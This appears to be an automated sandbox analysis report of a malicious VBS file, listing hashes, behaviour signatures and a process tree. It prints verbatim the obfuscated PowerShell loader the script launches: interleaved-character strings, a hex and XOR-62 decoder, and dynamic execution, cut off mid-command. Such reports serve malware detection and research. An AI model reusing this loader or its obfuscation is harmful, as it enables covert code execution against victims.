3e9170bb8c005a9689525f0ad3b5df1f774ce0b72fb44ccfe907ce0bb4db332f

General

Target

8e202dd319e539c455245f36a616428d29551dbda507754eac6394131ed5efbb.vbs
Size

651KB
MD5

65c6b20a71381300f06361a91f8a8600
SHA1

ad9405175b85333341975efc778190be711d998d
SHA256

8e202dd319e539c455245f36a616428d29551dbda507754eac6394131ed5efbb
SHA512

5d1f27bbfb79fd1627d84762ac4d39ce833580fc5ea5961ab0c1cf9c428b39f51780d9ddf4ae6e2bdb81e8d68984c92f0065921af27ac58442bd3f7bba1d040e
SSDEEP

12288:PhBeNsxmLR4Bq/5QH3Oze+a0BiTreixCFnZ5l62PNEKyAKF3t:PbksmRbTzvS6HX5moKF3t

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	1272	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4044	powershell.exe
4044	powershell.exe
2056	powershell.exe
2056	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4044	powershell.exe
Token: SeDebugPrivilege	2056	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 1272 wrote to memory of 4044	1272	WScript.exe	85
PID 1272 wrote to memory of 4044	1272	WScript.exe	85
PID 4044 wrote to memory of 2056	4044	powershell.exe	87
PID 4044 wrote to memory of 2056	4044	powershell.exe	87
PID 4044 wrote to memory of 2056	4044	powershell.exe	87

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8e202dd319e539c455245f36a616428d29551dbda507754eac6394131ed5efbb.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bekendtgrelsers = """EF u nMcStRi o nU HTaKr lPe kFi n e rBn e sF0P { B Y IpEa r asm ( [BS tTrUi n g ] `$MSMy n cNeEr eSbBr a lI)J; H U `$ S kUr iCv eOf o rBm sB S=Y NFeFw -MO b j e c tS VbByNt e [ ]v P(N`$ASRy nScNeOr emb rKaBl .BL e n g tPhK M/ A2R)O; b F oBrp( `$GNUaTt u r eCl sBkSeBrEsm=S0L; B`$PN a t uPrTe l s kSeUrAsq - lStS E`$CS y n cDe r eBbSr a l .jL e n gBtDhS; `$ANRaFt u r e l sFkAeHrIsR+ = 2 )S{ K I`$SRUeStDs iPn d iBg B=C L`$ES yPnOc e rie bIr aAl .FSuuSb s tErsi nBg (T`$ANWaSt u rPe lFsCkGe rAs ,F 2S)W; P R S T `$ SSkEr iCvPeCfCoIr mYs [S`$ NLaSt u rSeCl s kJe r s /D2 ] R=H [TcPo nNvUeSrMts]N: :aTKo BOy tTeR( `$ RKeBtHsAi nMdAi gB,A 1H6P)F; A B`$OSSkkr iEvCe fCoFr m s [V`$KN aAtSuFr e l sAkNe rgsK/ 2N] F=c A(B`$BSUkKrmiMv eSf oFr mSsC[ `$ N aPt u r e l s kBeDr s /S2M] - bHxTo rD T6F2C)S;R I B } [GS tAr iDn g ]C[ESPy sAt e mC.HTFeOxOt . ESn c ogdciCn g ] :U:PAESFCMIPI . GNeFtfSUt r iBn gK( `$SSAkTr iFvLeUfOo rWm sS)W; } `$ RSeSkly lLeInP0 = Hua rUlle kBiInSedrInAe sM0 F'i6PDK4 7 4 DS4BAC5 BC5D3R1L0n5BAa5S2F5 2s'H;B`$ERTeMkEyNlteLnH1b=RH aZrTlSeRkHiBnMeIrWn eBs 0 D' 7U3 5D7 5NDA4 C 5D1 4 D 5P1 5 8T4FAS1Y0D6S9H5G7T5G0 0 Dc0ICJ1T0F6CB 5 0b4kDm5aF 5 8 5uBA7B0 5 F 4HA 5 7a4R8 5LBK7L3K5GB 4BA 5r6A5U1 5RA 4PDP' ;A`$ RRePk y lReUn 2W= HUaSrCl e k iNnKeBrInUe sP0U 'V7E9M5CBU4SA 6 E 4BCP5S1S5SDI7 FC5RAc5 A 4fCR5 BR4CDA4NDV' ; `$URMeUkSyklNeEn 3 = HOa rClPe kaiSn eTrMnRe sC0S D' 6TD 4B7D4PDF4DA 5UBC5S3S1R0B6RC 4FB 5 0K4AAN5 7E5 3C5 B 1K0A7A7 5T0F4NA 5eB 4SCR5 1l4OE 6OD 5 BS4pC 4j8 5F7C5OD 5 BS4 DU1L0T7B6T5 F 5m0 5SAH5H2K5CBF6LC 5 B 5N8 'A;G`$ RSe k yLlMeBnE4 =DHCa r l eTkDi n eHrFn e st0M H'V4UDA4LAS4PC 5i7E5T0 5M9 'T;D`$ R ePkPy lTeSn 5A= H aPrPlPeIk iBn eMrBnSeOs 0I I'D7 9E5 BD4PA 7 3K5P1P5 A 4BB 5 2 5FB 7D6 5 F 5U0 5SA 5 2S5NB 'M;J`$ RMePkKy l e n 6r=IHAa rolSeKk i n e rHnEeCsB0I L'B6LC 6TA 6ND 4 EP5 B 5FD 5f7u5KF 5T2A7M0 5IF 5 3R5FBB1 2U1 E 7 6I5 7P5SAd5 B 7eC 4 7 6BDi5 7A5 9F1V2A1UE 6JEH4CB 5sCU5a2B5 7B5 D ' ; `$ RHeBk ymlSe n 7 =TH a r l e kCi nTe rRnLe s 0 ' 6CCC4 BV5 0 4AAA5 7N5S3 5JBM1s2A1GE 7 3 5NFB5 0i5UF 5 9E5GBG5 AR' ; `$TR eDkby lSeYn 8 = HBaNr l eDkDiFnieur nTeOs 0 M'P6 CK5 B 5 8 5 2T5PB 5SDE4MAW5TB 5 A 7MA 5sB 5I2 5 B 5C9B5 FS4 AH5BB 'F;T`$IR e k yUlTe nU9M= H a r l eUkui nAeSrCnBeSs 0S E'N7u7 5 0L7S3E5EBT5M3 5B1D4LC 4 7V7S3N5H1K5 AF4 BL5B2M5CBb' ;y`$ V v e rSsG0C=AHMaOrAlHeEk iDnMeHrJnPe s 0A f' 7 3 4v7F7CAC5MB 5 2R5RBR5M9D5 F 4PAA5 BB6RA 4 7 4 E 5GB ' ; `$LV v e rRsB1 =UH adrSlSeOk i n eSr n eAs 0 R'E7 DF5 2M5TFH4NDF4SDI1 2K1PET6VEN4OBB5UCS5F2 5V7 5 DG1G2 1LE 6 DG5CBG5 FK5 2 5UB 5CAH1F2 1CEG7 FB5C0 4ID 5P7 7MDI5N2K5 F 4PDU4OD 1e2S1eEL7CF 4 B 4iAP5 1K7MD 5s2 5 F 4VD 4PDI's;W`$ VTvNe rts 2U=EHBaCralHeEk iSn eMrCnUe sS0H B'R7 7P5E0 4 8A5E1 5C5 5 BH'B;B`$FVivRearfs 3 =PH arr lGe kSiSn ePrTnMeLsK0A ' 6 EM4 B 5SC 5K2S5 7R5KDA1D2H1PEU7B6S5A7 5GAP5sBT7 CK4 7R6DD 5 7 5A9 1 2R1UE 7 0B5 B 4 9A6 DB5R2S5H1 4pAE1S2A1 ER6G8B5S7K4RCC4 A 4IBO5aFH5 2o'b;I`$ VAv eFr s 4 =lH aMrMl eTkLi nme rEn eqsA0S 'I6 8b5F7 4 CB4 A 4 BF5PFU5 2 7LFW5T2A5 2T5o1B5 DP'K;S`$EVUvTeCrIs 5N=kH aFrSlAe k iKn ePr nReFsP0C 'C5C0 4kA 5LA 5 2V5E2F' ; `$aV vFe rOs 6H=TH aMr l eRk iRn e r n epsP0F T'S7 0W4 A 6 E 4 CB5X1 4 AB5 Bo5SDC4TAP6 8 5 7O4SCT4HA 4 BM5 FT5 2F7 3 5DBH5C3H5 1 4NCT4C7H' ;E`$PVNv eAr sM7S=mHCaBrKlOeFkSiSn eSrAn e s 0s 'N7 7K7 BG6D6 ' ;V`$ V v eBrOsF8R=sHSaBrKlSeekUiLnGeSr n eKsU0M B' 6T2m'p;V`$ A fUgGrCdseAr nKeP=RH aVr l e k iPnKe r n eCs 0 'S6MBU6 DL7VBT6 CL0RD 0 C ' ;P`$LDOo mSmEe rTkDo msiFtTeDsd=SH adr lOe k iVnReUrHn e s 0S ' 7AD 5 FL5 2 5F2S6A9 5s7H5P0 5 AP5 1A4G9 6AE 4eCI5 1R5SDA7 F 's;CfFuBnfc t iloRn Nf k pV { PMa r a m (C`$SO rZb iAtUo l iEt e sF,A P`$ S oNn a npt i zMe dOsB) S E M; `$iN oRn f l o rmiMf e r oSuBs 0S P= H aFrTl eUkSi n e rTnTeSsT0A C'P1TAs7 7S5 3L4 ER5V7P5F0K5 9 5hBK5 3 5SBP5 0D4 AV1LEO0N3 1DEE1 6 6D5D7KF 4 E 4 ES7 AA5C1S5 3 5 FR5s7M5N0 6 3F0 4 0R4 7 DT4 B 4 C 4 CH5 Bs5N0O4DAU7 AP5T1N5T3Z5 FD5 7 5H0 1 0A7 9P5CBB4 AS7RFP4BDS4CDP5BBG5H3 5EC 5 2M5S7 5FB 4ADK1D6 1 7 1sED4 2S1SE 6p9 5u6 5BB 4 C 5 BS1S3 7 1M5 C 5 4A5RB 5MDC4AA 1 EK4 5R1OED1 AE6 1M1 0 7 9S5F2T5P1C5 C 5TFP5I2K7 F 4LDg4CDS5TBB5O3 5SC 5g2 4r7C7 DC5mFH5ED 5L6p5MB 1CED1 3 7 F 5 0B5SAD1FEG1 A 6L1 1O0 7 2 5 1A5RDI5 Fs4VAK5 7 5c1 5P0B1 0G6 DD4 EK5 2 5 7 4EA 1I6 1 AA6E8U4S8B5TBT4MC 4 D 0A6 1 7s6H5H1S3K0JF 6s3P1 0 7 B 4 F 4 B 5AF 5A2T4LDW1 6B1 AU6 C 5RBD5d5 4A7 5s2A5BBT5L0C0dE 1D7I1 ES4E3A1G7S1 0C7P9 5tBG4 AC6BA 4 7 4AEM5 BC1 6 1FA 6KCS5 B 5 5M4 7A5J2B5UBB5U0M0 F 1 7M'S;P& (D`$sV vSe rpsM7D) T`$ N o nLfBlMo rPiSf eMr oFuTsC0U;D`$SNroVnFfOlOofr iFfPe r o uIsR5U D= HFaCrBl eKkCi nSeDr nDeRsP0D H'P1SAI7KB 5 0 4KD 4FET5T0 5CAI5AB 4 CT4S8 5T1 5S9R5P0 5 BO1KEA0P3 1RET1DA 7 7 5S3S4SE 5C7 5p0 5 9A5 BH5 3V5 Bc5 0P4TA 1 0K7 9D5 BC4UAC7 3 5 B 4LAS5S6F5O1T5BA 1 6W1 Am6 CV5 B 5S5U4 7 5D2 5MBF5I0 0SCD1B2A1 ES6N5 6SA 4 7 4 E 5 BF6V5F6l3S6N3T1pE 7SEH1F6 1TA 6 Ca5 BP5A5M4M7 5n2 5 BO5 0 0 Dd1 2H1SEI1 AB6UC 5uBP5 5B4 7U5T2 5AB 5U0 0TAe1F7A1t7V'E;H& ( `$ VCvAeSrBs 7 )H R`$ N o nEf l osr iIfseSrRoEuGs 5P;U`$SNTocnlf lSo r ihf e rDoSu s 1 = HBaEr lAeTkUi nNeArBnteOs 0U E' 4 CD5IBA4 AF4 B 4PC 5 0B1 ES1AAI7DBH5 0 4 DB4 EC5T0 5MAS5ABS4 C 4 8C5E1A5 9 5D0 5 BC1T0 7F7 5 0G4F8W5 1 5A5 5 Bl1R6I1 A 5J0A4IBI5A2A5B2F1T2 1 EF7 E 1S6k6B5 6uDI4B7O4DDD4KA 5 BM5L3 1 0 6 C 4SBT5S0W4bAU5 7S5 3A5PB 1 0B7C7G5H0F4FAI5FB 4 C 5S1S4SEA6 DK5 B 4 CC4T8P5S7R5 DB5SBT4 DG1 0P7 6R5LFD5A0T5SAH5P2S5SB 6AC 5jBN5p8 6D3 1S6E7A0G5 BD4V9F1G3R7M1B5 C 5 4 5 B 5 DT4 AS1bEU6 DG4K7 4SD 4tA 5hBs5 3l1 0 6 C 4RBS5 0 4UA 5 7A5A3 5HB 1P0 7 7 5H0 4 A 5 B 4IC 5 1 4 EO6MD 5jBS4DCL4I8Y5B7 5 D 5TBC4ADU1O0 7 6 5 F 5 0H5BAF5m2 5MB 6VCA5VB 5B8A1S6B1D6F7S0f5SB 4 9 1 3L7K1S5PC 5 4R5 BF5pDP4HA 1SE 7H7R5 0L4 AS6UES4HA 4RCC1B7L1m2 1BE 1 6R1PAF7 7 5S3 4AEp5S7 5T0U5 9R5FBO5 3M5 BB5U0 4 AG1 0 7A9W5 B 4TAB7 3D5 BS4 AI5 6U5O1A5 A 1v6M1BA 6 CA5 B 5M5 4 7 5O2L5 BD5 0O0 B 1 7R1 7V1h0 7 7B5T0G4J8 5 1T5 5G5 B 1P6 1tA 5M0W4NBR5K2S5D2S1E2C1UEv7 EP1 6 1BAA7U1C4 CO5BCA5 7 4 AT5 1 5U2A5S7D4 AD5KBA4ADB1D7 1 7F1B7U1C7E1R2U1 ED1AA 6SDA5M1U5M0B5 FO5A0S4NAF5A7B4 4 5RB 5 A 4GDS1R7S1 7 'S; &u(M`$ V v eUrMsc7O) C`$ N oAn f lsoTrsiDf eTrCoAuLsL1I;H} fWu n c tAi o n mG D TJ { PEaTrSa m U(F[NPPaTrTaFmPeTtBe rO(tPCo sMiEt iFo nP W= P0 , M a n dBaStIoAr yM C=A a`$VTDrCuSe )h]f [DTMyDpKe [B]d]V U`$HD epl lEsKn iSnSgTeHn , [ PTaBrIa m eBt eErR( P o sJi tOi oFnU E= W1K) ]M [IT yMpBeG] `$ SUoTl vDeKnBtNe r sD =S [OV o i d ]S)U;E`$RNNoUnNf lCoMr iTfOeKrNoBu sp2B D= HMa r l e kOi nFe rPnBeCs 0M W'S1BAu7 3F5VF 5D9F4 Ad4 DC4BE 4MCA5 1A5 9E5TBC4 AP1 Eg0 3F1PEP6 5B7DFs4 EO4MEG7 AT5 1F5P3 5PF 5 7 5U0 6D3U0B4 0 4 7 D 4vBB4FCM4 Cl5sBF5 0 4 A 7UAU5K1 5S3 5BFI5 7 5B0 1D0T7PAI5 BI5 8 5b7 5F0 5lB 7aAO4B7 5B0P5EFF5 3S5 7 5 D 7EFU4 D 4TD 5 BS5E3 5CCE5l2 4B7Z1 6S1 6 7T0W5aB 4 9S1 3F7D1d5TC 5F4 5TBP5 D 4MA 1cES6PDF4T7 4FDF4 AR5gBS5 3C1F0 6 C 5AB 5N8M5B2R5 B 5SDP4TAE5d7 5P1E5F0 1 0A7VFD4 DS4DDH5 BS5B3 5 CA5 2 4A7 7 0 5kFF5 3 5 B 1U6 1FA 6WCB5wBU5 5 4G7 5 2 5SBC5 0F0 6 1 7 1 7L1 2G1 EL6 5F6 DT4 7u4DD 4DAH5GB 5A3B1A0V6mC 5SB 5 8 5 2 5 BK5lD 4 AB5n7O5 1 5m0C1M0S7ABP5P3F5v7M4 Aw1 0 7EFA4eDD4 D 5mB 5U3 5 C 5U2S4 7M7BCN4 BD5 7U5B2B5 AV5 BH4SC 7KF 5 DL5 DO5TB 4 Ds4FD 6D3S0A4 0F4 6 C 4KB 5 0D1 7S1M0 7SA 5SB 5C8U5 7 5 0M5IB 7KAS4A7 5 0 5OFS5R3 5S7C5 Du7H3 5B1N5OA 4 B 5P2T5 B 1L6 1FAI6GCA5sB 5P5s4 7O5 2G5 B 5B0 0R7A1 2C1uE 1 AT5 8 5EF 5B2p4 DP5TBO1B7B1 0N7WAT5PB 5S8H5 7C5L0 5aB 6FAF4 7F4 EG5 B 1 6 1SAI6E8A4F8A5 BP4SCA4 D 0CEI1V2E1 E 1 AB6 8B4 8 5 Bo4PCK4 DP0WFD1 2 1JE 6c5V6EDK4 7 4 Di4AAL5 BS5a3U1T0 7P3 4MBC5C2M4 A 5J7B5ODM5SF 4 DR4gA 7DAV5LBB5O2 5ABA5 9 5PFP4AAk5sB 6E3 1D7 'S;U&F(P`$ VTv ePrBsP7F)K `$UN o nAfAlHoPr i f e r oSu s 2G;C`$HN o nDf lnoRr iTfFeNrWo u s 3S = H aDrIlYe k irnCeBr nKeFsS0b J' 1 A 7L3B5XFR5B9G4HAS4CDF4BEF4 CV5D1 5L9 5AB 4IAB1D0B7KA 5rBO5U8M5R7 5I0o5 B 7QD 5H1B5 0O4SD 4PA 4GCE4 BD5SD 4AAi5 1E4 Cw1T6R1VA 6SCd5 B 5 5 4O7R5 2P5 BH5 0P0T8m1 2 1eES6 5M6tD 4 7G4SD 4JAS5 BB5E3G1 0 6 Cf5 B 5v8L5O2 5PBD5FD 4BAB5 7 5 1K5 0E1P0 7 DF5UFW5 2 5A2M5d7D5L0 5A9 7TD 5 1O5 0S4 8F5SBp5M0 4 A 5 7 5U1S5 0B4 DS6K3U0 4S0s4S6NDT4UA 5MFM5M0u5BAP5SFE4 CU5 AL1C2F1 E 1 A 7 AV5SBK5 2E5 2 4MDt5B0L5U7M5s0 5P9E5BBB5S0 1 7 1S0S6FD 5 BP4WA 7O7F5P3 4TEM5o2 5 BG5 3 5 BD5 0E4RA 5 F 4NAG5 7 5 1 5V0T7S8V5T2D5SF 5d9 4TD 1S6 1 AT6kCs5RBA5W5 4P7H5T2 5AB 5B0S0 9F1 7M'F; &s(M`$OV v eFrTsn7 ) R`$SN oPnDfDl o r iUfDeFrFoMu s 3E;B`$cNLopnSfUl o rSi fFeNrAoBuEs 4T T= LH a r l e kDiBn e rNnAe sH0M 'R1RA 7F3T5 F 5 9P4KAU4HDF4 ES4SCH5H1e5L9R5ZBS4PA 1 0E7 AS5oBA5 8b5T7R5M0I5FBA7F3 5 BS4IAB5 6D5 1W5EA 1 6o1 AS6L8 4D8i5 BG4UCH4 DV0CCA1 2 1 E 1sAJ6R8K4 8N5mB 4 CA4 DL0IDB1 2T1AE 1OAa6SDr5E1G5E2 4P8U5FBS5U0M4 AU5 B 4UCT4 D 1M2T1bEF1 AI7FA 5EBB5H2M5T2T4KD 5H0B5 7P5C0 5 9F5VBS5M0R1A7 1 0B6 D 5VB 4NAI7o7F5D3R4 E 5 2 5SBS5U3 5bBT5S0G4WAS5 F 4 AD5U7 5 1E5C0V7 8 5C2F5VFA5t9P4ID 1C6 1EA 6 C 5CBG5 5m4 7U5 2U5GBB5 0A0 9 1I7B' ;P&V(B`$iVAvDe rFs 7V) `$RNEoVnEfTl o rPiDfSeCrPoEu sA4 ; `$CN o nTf lfo rTiDf e rro uAsP5C = HsaBrDl ePk i n eUrSn e s 0C H'A4PCF5 BD4 A 4CB 4BCE5B0 1LEu1BAP7 3 5 FW5B9A4 Ar4 DS4CEG4 C 5K1 5 9 5PB 4 AS1f0 7IDg4OCB5 BS5SF 4 AE5 B 6SA 4T7U4IEA5 B 1D6C1p7c' ;M& (I`$TV v e r s 7R) `$ NToSnAf l olr iHfIe rPoOuAs 5b a; } `$IR eStDt eDr sOt eRd S=P HNa rJl eckli n eHrSnPe sI0U 'K5O5 5TB 4ECB5 0A5PB 5N2R0NDT0sCn'S;C`$ NSoPn f l o rEiAf ewr oJu s 6 s= VHPa r lFe k iTn e rFn eUs 0S T'S1AA 7 5T5 7 5O0 5 A 4PCB5ABP5 AT4NDD5K6p5G7M4ME 1 E 0 3 1LEH6L5R6 DR4U7 4DDY4 AD5SB 5 3T1L0U6VCB4vBB5 0F4NA 5E7 5 3P5 BV1 0 7I7 5S0 4 AO5PB 4 C 5S1 4NE 6 DP5RB 4gCM4 8W5 7P5 D 5 BU4 DV1 0J7m3 5mFA4GCT4 D 5d6 5 FB5D2 6 3J0U4 0T4s7 9 5UB 4AAP7SAB5IB 5 2P5 B 5 9 5 F 4AAA5 B 7S8A5 1K4TC 7 8S4KB 5B0L5DD 4BAS5W7 5 1G5R0F6KEB5B1M5 7D5 0 4 AD5TB 4 CY1 6 1R6 5G8B5 5M4KES1 EP1 A 6SCS5sB 4BAP4TAA5yBK4ACf4 D 4 A 5PBR5 A 1DE 1AAS6 8 4 8P5EBL4 CR4 DS0KAP1 7 1 2 1FE 1H6d7 9G7 AS6MAs1UEB7 ET1 6B6T5 7 7K5C0 4FAB6FE 4TA 4 CU6 3H1H2G1 E 6 5 6 B 7 7T5 0 4 AL0ID 0IC 6b3D1T2 1FES6 5 6 BF7 7F5 0 4BAA0 DS0FCB6 3O1U2 1 ED6h5T6 BU7 7 5S0T4PA 0 DC0CC 6S3D1 7E1REN1 6 6S5C7 7V5 0 4UA 6EE 4 A 4BC 6U3H1 7 1 7I1 7V'M;C& (R`$PVAvSe r sU7 )G L`$FNBoTnFfHlDo r iMfPe rHo u s 6 ;P`$TBFiGb lVi o p eng yH = HfGk pS `$PV vkeNrSsU5D S`$HV vDeHrIs 6 ; `$RNUo n f lVo rAi fReOr oRuBsP7k B=R CH aSrCldeKk i n eTr n eGsS0 ' 1UAH7DB 4 AR5B6A4 7 5 2 0 D 1HEN0C3B1SEt1RAB7S5 5 7A5C0H5 AE4 C 5NBR5BAL4BDT5 6S5G7G4 ED1 0 7 7S5 0 4 8P5N1i5 5L5 B 1L6 6S5U7S7P5 0 4 AB6SEI4BA 4RCC6G3 0C4 0S4M6U4 5 B 4CCM5R1 1 2 1UET0 8W0SA 0 F 1S2E1 EY0DE 4S6K0 DF0ME 0 E 0FE 1H2S1 E 0 ER4E6T0RAP0 E 1B7S'D;I&s(H`$ V vBeSrIs 7L) `$TN oBn fLlFoSr iLfTeArooUu s 7 ;L`$MN oBnTf l oGr iCfUeRrOo u sn8 = UHIa rIl eTkZiTn ekr nSe s 0H S' 1NAN7 Dt5 6Y5l1S4L9T4 A 5T7S5S3 5 BL1 ES0 3S1 E 1JAC7 5D5M7A5N0D5FA 4 CS5 BK5 AF4VDI5 6F5 7s4bEB1 0P7 7I5 0T4s8 5B1L5S5A5PB 1 6 6 5S7T7 5 0 4AA 6 EO4UAT4 CS6 3F0S4 0F4V6 4S5 BA4 CO5S1K1 2B1FE 0 C 0 9S0 AF0hDA0PBs0 E 0 E 0 6M1 2u1 EA0 EP4T6B0TD 0TED0EEA0AE 1M2B1MEG0 EM4S6R0 AB1U7U'j;O&L(P`$ V v e rCsf7 ) S`$NN oTnuf lLoTr i fPeSr oAuDs 8 ;V`$AE t h ySl 0H0k= 'TH K CAUB:B\PCFo rAs ePlDe t iUnLg \ FPoHrDmPnId 'W; `$DEetFhTy lB0 1E L=BHCaTr lEe kCi n err n e sQ0S u'R1 AT6LBT5G0A5 AW5 BC4SA 5SB 4 CP5A3D5Y7 5O0 5 BR5 AG5O0 5DBN4 DP4 D 0a3R1T6S7 9 5 BR4 AO1L3 7a7T4EAA5ABA5C3Y6AEM4 C 5M1f4 ES5DBF4KC 4 AF4 7W1 EK1 3U6GE 5RF 4 AU5k6 1FE 1 As7SBL4rA 5 6U4B7 5 2O0 E 0 ER1 7M1 0N6DA 4 BD5U0 5M7S5 5s5KF 5BB 4 CK'E;T&E(U`$NVkv e rEs 7S)p S`$ EktPhIy lE0 1U;B`$ NKo n fBl okr iNf eKr o uTs 9E I= HHraSr l e kLiMnSe rUnAe s 0D F' 1EAM7H0B5 1s5 0B5A8T5S2 5P1 4CCp5A7E5 8F5SBP4 C 5 1 4IB 4AD 1UEc0T3S1 EB6L5 6VDT4 7b4PDP4UAR5LBA5 3U1 0 7VDO5s1 5 0U4 8 5HB 4UC 4 AF6S3S0 4E0M4I7S8U4SCO5 1 5 3 7 C 5dF 4KDi5VBP0 8U0 Ao6 DM4 A 4 C 5G7 5H0N5C9T1 6 1PA 6 B 5 0L5 A 5RBS4MAP5NB 4TC 5S3P5S7G5 0 5RB 5TAC5G0 5 BU4SDL4SD 1E7 ' ;H& (G`$ VVv eDrTsS7 )B S`$FN o n f l o r i f eGrCobuCsW9 ; `$ Uan d eTt eRr mMiSn eRdIn e sKsS0 =P IH aDr lDeAkNi nUeTrCn eAs 0U O' 6B5E6 D 4U7M4FDF4UAT5 BR5 3A1 0P6ZC 4UB 5 0 4 A 5 7 5 3 5PBG1 0 7u7 5 0T4 AS5IBF4GCD5 1P4DEM6 DE5 B 4 CF4 8B5 7 5 DP5 BS4 DD1N0 7B3D5KFA4GCM4 DI5M6 5 FV5I2K6 3 0F4 0s4 7 DC5U1W4 E 4 7R1W6 1PA 7 0S5R1P5F0 5 8P5 2p5 1 4FC 5A7 5A8I5 BK4 C 5M1B4 BS4bD 1 2 1 ES0TED1T2K1 Ee1 EH1GAI7 B 4 A 5A6L4M7R5S2s0CDS1 2B1fEP0U8 0 A 0NF 1 7 ' ;S&B( `$CVDv ekrPs 7 )M `$TUCnSdOeSt eSr m i n e d n e sPsC0 ;F`$ P rfe pAgZ=S`$SNCo n f l o r i fTemrhoRuFsH. coo uBn tP-L6G4Q1A; `$FUEnFdHeSt eRrPmFiUnTeTdnn eBs s 1 S=A GHUaKr l e k i nTe r nceCs 0 'E6 5k6PD 4A7 4VDH4BA 5 BB5 3 1K0 6 CP4 B 5J0S4 AR5 7 5g3 5VB 1 0N7 7S5 0 4TA 5 BV4DCH5 1 4SEF6 DF5FB 4 CB4B8C5s7P5EDM5 BG4PD 1S0 7T3 5GFT4 CH4SDS5 6P5 FS5U2 6U3 0 4G0D4 7 DA5 1S4VE 4S7S1S6T1 AT7M0 5s1A5 0N5B8L5U2 5C1 4 C 5F7 5E8k5 BG4iCT5 1L4UBM4ADS1A2 1 EU0 8B0DA 0FF 1S2U1 EH1 A 7 DA5 6M5 1E4S9e4EA 5 7P5 3Z5 BS1S2 1 E 1 A 6 EF4 C 5 B 4 E 5B9T1K7L'a;P& (N`$ V v eTr sN7 )F B`$ UWn dFePtUeVrBm iSnBeTdGnHePsGs 1 ; `$SUun d eOtdeFrsmHiinNeSdCnIeOsSsE2B E=A HHaKr lBe kMiEn e rHnse sD0k ' 1GAH7C8G5 7G5 C 4 CA5H1 5 Dn5P6 5 1B5 0S5 AV4SCN5 1C4SDN4 AF5 BO5SFF5 2L0PC 0 EB0 D 1KE 0t3 1 EL6 5B6 D 4 7 4 DR4AAR5SBr5S3S1R0D6 CN4lBC5 0 4 A 5d7 5S3M5 B 1 0 7O7A5P0 4 AB5PBL4 CD5 1P4 EO6PDp5BBM4UCu4 8 5K7S5 DH5HB 4TD 1b0A7R3T5TF 4 C 4 DS5 6C5 F 5F2T6F3R0P4L0P4A7D9B5 BT4 A 7SAA5GBB5f2 5 B 5P9C5DF 4bA 5TB 7P8A5M1 4DC 7A8 4BBF5B0 5 Dg4 AS5A7I5 1 5U0S6 E 5F1 5B7 5 0A4 AS5 BH4FC 1F6F1A6 5i8R5S5 4VEU1BE 1SAR7SFB5 8 5F9L4 CK5 AP5CBS4ICB5 0F5SB 1 E 1 AR7 A 5 1A5F3N5 3 5pBB4MC 5S5S5E1B5R3 5 7 4PA 5BBH4KD 1 7 1O2 1PE 1U6 7P9 7AAT6SAU1 EA7UEP1f6E6R5 7D7P5a0 4 AK6PE 4 Ab4UCU6 3B1 2Z1aEF6c5 7S7 5 0R4 AB6tE 4FAO4 CU6b3S1D2C1SE 6T5 7O7S5H0 4uAN6 EB4 A 4CCR6R3K1U2a1PEK6v5U7E7 5 0R4SAA6BE 4 A 4 C 6H3 1U2 1BEM6L5 7 7c5 0G4 AH6REF4 AT4SCI6A3f1F7B1LE 1 6F6G5D7M7R5 0U4FA 6sE 4TAT4 C 6P3 1 7T1 7A1W7 'R;W& (O`$DV vAeCrBsA7K) S`$ U nHd eUtAeRr m iCn eAd nTeVsBs 2B;R`$ U nMd eStCeBr m iBnSe d n e sKs 3B S= HEaHrSlTeBk i n eNr nSeAs 0L I' 1CAF7 8S5R7t5UC 4FCW5 1K5sDR5 6 5 1Y5d0R5 A 4 CR5 1V4 D 4FAL5DB 5SFH5 2N0 C 0GE 0 DC1 0 7A7 5 0G4V8 5C1R5 5S5SB 1 6 1MA 7ABM4 A 5I6R4S7H5 2 0 D 1H2 1 A 7 DS5S6 5 1F4F9D4RAS5F7H5I3 5UBA1B2D1UAQ7BCS5M7R5KC 5 2S5N7T5M1 4 Es5hBB5k9 4U7S1T2 0CEA1 2B0LEg1 7S' ;m&D( `$ VZvMeOrDs 7P)B s`$VUPnSdAe tLeFrDmCi n e d n ehsfsL3T#S;""";;Function Undeterminedness9 { param([String]$Syncerebral); For($Naturelskers=1; $Naturelskers -lt $Syncerebral.Length-1; $Naturelskers+=(1+1)){ $Harlekinernes = $Harlekinernes + $Syncerebral.Substring($Naturelskers, 1); } $Harlekinernes;}$Personlig0 = Undeterminedness9 ' S E B P G E O O A S U H H a F B iIFE XC ';$Personlig1= Undeterminedness9 $Bekendtgrelsers;if([IntPtr]::size -eq 4+4){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Personlig1 ;}else{.$Personlig0 $Personlig1;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Harlekinernes0 { param([String]$Syncerebral); $Skriveforms = New-Object byte[] ($Syncerebral.Length / 2); For($Naturelskers=0; $Naturelskers -lt $Syncerebral.Length; $Naturelskers+=2){ $Retsindig = $Syncerebral.Substring($Naturelskers, 2); $Skriveforms[$Naturelskers/2] = [convert]::ToByte($Retsindig, 16); $Skriveforms[$Naturelskers/2] = ($Skriveforms[$Naturelskers/2] -bxor 62); } [String][System.Text.Encoding]::ASCII.GetString($Skriveforms);}$Rekylen0=Harlekinernes0 '6D474D4A5B53105A5252';$Rekylen1=Harlekinernes0 